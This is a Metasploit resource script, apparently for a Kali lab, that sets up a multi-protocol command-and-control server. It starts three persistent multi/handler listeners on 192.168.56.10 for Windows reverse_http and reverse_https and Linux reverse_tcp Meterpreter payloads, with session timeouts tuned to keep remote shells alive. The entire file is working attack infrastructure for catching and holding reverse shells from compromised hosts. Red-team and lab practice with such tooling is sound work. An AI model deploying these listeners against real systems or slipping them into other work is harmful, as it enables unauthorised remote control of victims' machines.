# Multi-Protocol C2 Handler Configuration

# Load Central Configuration
resource "/home/kali/Desktop/c2/msf-c2/config.rc"

# 1. HTTP Listener (Windows)
use multi/handler
unset PAYLOAD
set PAYLOAD windows/meterpreter/reverse_http
set LPORT 8080
set LHOST 192.168.56.10
set ExitOnSession false
set ExitNoSessions false
set SessionCommunicationTimeout 10
set SessionExpirationTimeout 3600
# Ensure handler waits for connections
set HttpWait 30
exploit -j -z

# 2. HTTPS Listener (Windows Encrypted)
use multi/handler
unset PAYLOAD
set PAYLOAD windows/meterpreter/reverse_https
set LPORT 8443
set LHOST 192.168.56.10
set ExitOnSession false
set ExitNoSessions false
set SessionCommunicationTimeout 10
set SessionExpirationTimeout 3600
set HttpWait 30
exploit -j -z

# 3. TCP Listener (Linux/MX)
use multi/handler
unset PAYLOAD
set PAYLOAD linux/x64/meterpreter/reverse_tcp
set LPORT 4444
set LHOST 192.168.56.10
set ExitOnSession false
set ExitNoSessions false
exploit -j -z
